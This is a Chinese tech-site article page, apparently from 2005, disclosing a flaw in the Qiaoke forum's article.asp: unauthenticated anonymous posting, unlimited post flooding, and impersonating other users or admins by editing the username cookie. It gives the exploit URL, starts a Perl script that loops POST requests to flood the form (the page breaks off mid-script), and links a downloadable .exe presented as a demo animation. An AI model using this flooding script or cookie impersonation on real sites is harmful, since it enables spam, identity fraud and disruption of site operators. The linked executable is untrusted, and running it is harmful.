文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 系统安全乔客论坛存在的安全隐患
精品推荐
特别推荐
·不起眼但很强大的系统自带杀毒工具
·别小瞧基本的系统命令
·加强系统安全性的小技巧
·自设六大关口防止计算机泄密
·互联网领域“打黄扫非”IE插件各显神通
·改变系统安全等级的十大建议
·合理增加账户 确保系统的安全性
·系统安全对IE优化设置六大技巧
·Windows是如何进行自我保护的
·新手指南:可安全删除的文件类型
·艳照门反应出隐私保护问题 文件不能一删了之
·陈冠希事件的启示 明星电脑安全防范手册
·应用安全是后端数据保护“要塞”
·Windows的安全模式的应用技巧
·实现自我安全检查机制之十步走战略
·Windows用户摆脱黑客攻击的技巧
·修改系统设置 打造安全的个人电脑
·修改设置 打造安全的个人电脑
·Windows系统用户摆脱黑客攻击的方法
·巧用Syskey命令保障系统安全
热点TOP10
·修改系统设置 打造安全的个人电脑
·侵入最大的六合彩论坛系统---六合专用BBS
·另辟蹊径:Windows系统防病毒另类高招
·别小瞧基本的系统命令
·加强系统安全性的小技巧
·禁掉一百年也用不到的系统服务
·公开密钥密码系统
·不起眼但很强大的系统自带杀毒工具
·深入认识如何选择与保护密码
·利用Serv-U缺陷提升Webshell权限
·安全性与密码相对强度的暗战
·自设六大关口防止计算机泄密
·封锁Windows网络端口保证系统安全
·安博士互联网安全2008白金版试用
·保驾护航 对登陆密码设置进行限制
·IDC 网络与系统安全部分设计方案
·win2000 xp 系统密码破解
·这个马儿太厉害 浅析灰鸽子的防范与清除
·系统防御战:黑客网络攻击的预防措施
·mysql获得系统权限

乔客论坛存在的安全隐患

日期:2005年3月14日 作者:清风网络学院 查看:[大字体 中字体 小字体]


=版权所有  软件 下载  学院  版权所有=

这个漏洞出现在:个人专栏-发表我的文章,当用户登陆后,点发表我的

 

文章时,有个文本框出现的是你的登陆名,发表文章是以你的

名义的,但由于这个article.asp缺少认证,我们不必登陆直接提交如下url,

 

这时你可以匿名发表文章给各个主编:

http://127.0.0.1/1/article.asp?action=add

 

这样在查看数据库中的article_add表中的username栏时为空,也就是不能只

 

知道是谁发的,即使你发表一些过激的言论管理员也不能拿你

怎么样,不能禁用你的帐号。

 

要命的是程序对用户发表文章的间隔也没有限制,我写了个程序,是在本

 

机测试的,一分钟能刷几百封,而且是匿名的,如果放在十台机上

跑一天,你算一下在文栏管理-网友发布中要收到多少投稿,这不是影响了文

 

栏主编的正常工作。

 

 

更要命的是还有一招借刀杀人,username栏时不为空,而是用别人的名字

 

,这个方法是以你的名义先登陆,然后修改cookie中的用户名

为你要冒充发言的人,然后直接提交如下url:

http://127.0.0.1/1/article.asp?action=add 其中的127.0.0.1/1/要改为

 

网站article.asp的真实路径,这样你可以看到文本框中出现的

就是你要冒充的人的名字了,查看数据库中的article_add表中的username栏

 

就是这个人说的了,你可以冒充管理员给各文栏主编下命令了。

 

我做了个演示动画,大家可以下一个看看,动画也演示了炸弹的威力!

下载地址:

 

http://members.lycos.co.uk/zhuoqing/king.exe

注意: 一定要用flashget下,ie下不了

 

已下是动画教程中涉及到的Exploit

#!/usr/bin/perl

# code by pinkeyes

print "pinkeyes is your best friend\n";

print "welcome to 海洋顶端网,and http://xiaomutou.51.net/bbs/\n";

use HTTP::Request::Common;

use HTTP::Response;

use LWP::UserAgent;

 

$ua = new LWP::UserAgent;

 

$ARGC = @ARGV;

if ($ARGC != 1) {

print "usage: $0 <times>";

exit(1);

}

 

$times = shift;

for($k=1;$k<=100 * $times;$k++){

for ($j=1;$j<=$times;$j++){

for ($i=1;$i<=$times;$i++) {

$response = $ua->request(POST 'http://127.0.0.1//1//article.asp?action=chk',

[


[1] [2] 下一页 




上一篇:MSN短信通:让国内MSN用户也能发短信

下一篇:网络游戏下载

乔客论坛存在的安全隐患 相关文章:
·局域网上网的安全防范与技巧
·网络上人气最旺最酷论坛排名
·中小企业整体网络安全解决方案解析
·解析远程控制带来的安全危险
·如何以安全模式启动计算机
·修改系统设置 打造安全的个人电脑
·基础知识 初级黑客安全技术命令详解
·不怕攻击 家庭上网必学八招安全绝招
·教你如何保证Microsoft Access的安全性
·如何进入QQ空间安全模式
乔客论坛存在的安全隐患 相关软件:
·2007网络安全黄皮书V1.0.0
·如何加固Windows XP 主机安全
·中国PHOTOSHOP联盟论坛精华
·360安全卫士v3.2
·中国网管论坛精华电子书
·防骗 安全教育片
·一蓑烟雨论坛精华集2007①
·星星论坛06年春节节后技术文章综合
·新浪论坛鬼故事系列1
·第五届北大光华新年论坛-经济改革与社会信任

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot